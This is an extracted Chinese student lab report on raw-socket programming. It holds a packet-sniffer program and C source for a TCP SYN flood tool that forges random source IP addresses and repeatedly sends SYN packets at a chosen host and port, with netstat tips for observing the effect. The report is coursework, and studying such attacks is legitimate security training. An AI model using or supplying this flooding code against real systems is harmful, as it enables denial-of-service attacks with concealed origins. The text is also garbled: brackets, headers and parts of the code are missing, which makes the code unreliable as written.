《信息安全系统实践第十一次作业原始套接字.doc》由会员分享,可在线阅读,更多相关《信息安全系统实践第十一次作业原始套接字.doc(2页珍藏版)》请在课桌文档上搜索。
1、课程名称信息安全产品开发实践 实验课时4实验项目原始套接字实验时间实验目的利用原始套接字实现一个TCP SYS flooding 程序实验环境虚拟机 Red Hat Enterprise Linux-VMware Workstation实验内容算法、程序、步骤和方法 由于我们在这次实验中只需要对IP和TCP头部进展修改,所以使用的是网络层原始套接字。 这个实验考验的是对IP和TCP报头结构体的了解,其实在之前的实验我们就已经有所接触,在嗅探器中我们就是把接收到的数据包进展分解,分别先后解封IP头部,再解封TCP头部越底层的数据越放在前面。这一局部知识可以参考在教师的demo程序packet.c
2、,那是一个使用链路层套接字的嗅探器,不过在输出ip地址那局部需要改动一下才能正常运行。下面把修改后的packet展示一下:#include #include #include #include #include #include #include #include #include #include int main(int argc, char *argv) int sock, n; char buffer2048; struct ethhdr *eth; struct iphdr *iph; struct tcphdr *tcph; if (0(sock=socket(PF_PACKET,
3、 SOCK_RAW, htons(ETH_P_IP) perror(socket); exit(1); int num = 1; while (1) printf(=n); /注意:在这之前我没有调用bind函数,原因是什么呢? n = recvfrom(sock,buffer,2048,0,NULL,NULL); printf(number: %d ,num+); printf(%d bytes readn,n); /接收到的数据帧头6字节是目的MAC地址,紧接着6字节是源MAC地址。 eth=(struct ethhdr*)buffer; printf(Dest MAC addr:%02x
4、:%02x:%02x:%02x:%02x:%02xn,eth-h_dest0,eth-h_dest1,eth-h_dest2,eth-h_dest3,eth-h_dest4,eth-h_dest5); printf(Source MAC addr:%02x:%02x:%02x:%02x:%02x:%02xn,eth-h_source0,eth-h_source1,eth-h_source2,eth-h_source3,eth-h_source4,eth-h_source5); iph=(struct iphdr*)(buffer+sizeof(struct ethhdr); /我们只对IPV4
5、且没有选项字段的IPv4报文感兴趣 / if(iph-version =4 & iph-ihl = 5) if(iph-version =4)char addr_p1INET_ADDRSTRLEN;char addr_p2INET_ADDRSTRLEN;inet_ntop(AF_INET,&iph-saddr,addr_p1,sizeof(addr_p1);inet_ntop(AF_INET,&iph-daddr,addr_p2,sizeof(addr_p2); printf(Source host:%sn,addr_p1); printf(Dest host:%sn,addr_p2); if
6、(iph-protocol=6)/TCP tcph=(struct tcphdr*)(buffer+sizeof(struct ether_header)+sizeof(struct ip); printf(Sourport:%dn,ntohs(tcph-source); printf(Destport :%dn,ntohs(tcph-dest); 这里主要修改的地方是:1、 原代码问题:在输出ip那局部需要利用inet_ntop函数,不然程序运行出问题。2、 参加了TCP头部解封,输出源端口和目的端口,当然还要把相应的头文件参加。 其实只要把上面这程序和这次的syn flood结合起来再做点
7、修改就可以做出一个syn端口扫描器。接上实验内容算法、程序、步骤和方法而这次的syn flood程序中做的就是和嗅探器相反的工作:先封装IP头部,再封装TCP头部。程序的主要流程就是:构造IP头部构造TCP头部发送数据。这是一个循环的过程不停发送syn攻击,里面需要注意:1、 TCP头部中syn要标记为1,其它皆为0。 2、每循环一次,伪装的源IP地址就要改一次,那IP头部的校验和就要重新计算,当底层的报头有所改变IP头部,那上层的头部TCP头部的校验和同样要重新计算。有关检验局部,在运行syn flood程序之前,必须先运行一个服务器程序来作为攻击目标。关于观测端口连接情况,教师提供的是ne
8、tstat -tn,如果想看得更加方便的话,可以使用netstat -tn | grep “:888这样来监视某个端口。#include /printf #include /memset #include /for exit(0); #include #include /For errno - the error number #include #include /hostend #include #include /Provides declarations for tcp header #include /Provides declarations for ip header unsign
9、ed short csum(unsigned short * , int ); struct pseudo_header /needed for checksum calculation unsigned int source_address; unsigned int dest_address; unsigned char placeholder; unsigned char protocol; unsigned short tcp_length; struct tcphdr tcp; ; struct in_addr dest_ip; int main(int argc, char *ar
10、gv) /Create a raw socket int s = socket (AF_INET, SOCK_RAW , IPPROTO_TCP); if(s 0) printf (Error creating socket. Error number : %d . Error message : %s n , errno , strerror(errno); exit(0); else printf(Socket created.n); /Datagram to represent the packet char datagram4096; /IP header struct iphdr *
11、iph = (struct iphdr *) datagram; /TCP header struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip); struct sockaddr_in dest; struct pseudo_header psh; char *target = argv1; if(argc 3) printf(Please specify a hostname and a port n); exit(1); /get the target ip dest_ip.s_addr = inet_a
12、ddr( target ); /IP_HDRINCL to tell the kernel that headers are included in the packet int one = 1; const int *val = &one; if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one) ihl = 5; iph-version = 4; iph-tos = 0; iph-tot_len = sizeof (struct ip) + sizeof (struct tcphdr); iph-id = htons (543
13、21); /Id of this packet iph-frag_off = htons(16384); iph-ttl = 64; iph-protocol = IPPROTO_TCP; iph-check = 0; /Set to 0 before calculating checksum iph-saddr = sour_ip.s_addr; /Spoof the source ip address iph-daddr = dest_ip.s_addr; iph-check = csum (unsigned short *) datagram, iph-tot_len 1); /TCP
14、Header tcph-source = htons ( source_port ); tcph-dest = htons (atoi(argv2); tcph-seq = htonl(1105024978); tcph-ack_seq = 0; tcph-doff = sizeof(struct tcphdr) / 4; /Size of tcp header tcph-fin=0; tcph-syn=1; tcph-rst=0; tcph-psh=0; tcph-ack=0; tcph-urg=0; tcph-window = htons ( 14600 ); / maximum allo
15、wed window size tcph-check = 0; /if you set a checksum to zero, your kernels IP stack should fill in the correct checksum during transmission tcph-urg_ptr = 0; tcph-check = 0; / if you set a checksum to zero, your kernels IP stack should fill in the correct checksum during transmission psh.source_ad
16、dress = sour_ip.s_addr; psh.dest_address = dest.sin_addr.s_addr; psh.placeholder = 0; psh.protocol = IPPROTO_TCP; psh.tcp_length = htons( sizeof(struct tcphdr) ); memcpy(&psh.tcp , tcph , sizeof (struct tcphdr); tcph-check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header); dest.sin_fami
17、ly = AF_INET; dest.sin_addr.s_addr = dest_ip.s_addr; /Send the packet if ( sendto (s, datagram , sizeof(struct iphdr) + sizeof(struct tcphdr) , 0 , (struct sockaddr *) &dest, sizeof (dest) 1) sum+=*ptr+; nbytes-=2; if(nbytes=1) oddbyte=0; *(u_char*)&oddbyte)=*(u_char*)ptr; sum+=oddbyte; sum = (sum16)+(sum & 0xffff); sum = sum + (sum16); answer=(short)sum; return(answer); 下面让我们看一下运行效果:运行syn flood程序,使用不同的伪装IP攻击:然后检验结果:数据记录和计算 结 论结 果通过小 结 这次实验虽然不难,但是比拟重要,如果只是单纯得制作普通的网络程序的话,一般的socket编程足以完成,但是如果想深入探究网络服务本身,想利用rfc的规如此制造底层的扫描器、嗅探器、防火墙、网络攻击等等,学习网络底层的编程知识很重要。指导教师评 议 成绩评定: 指导教师签名: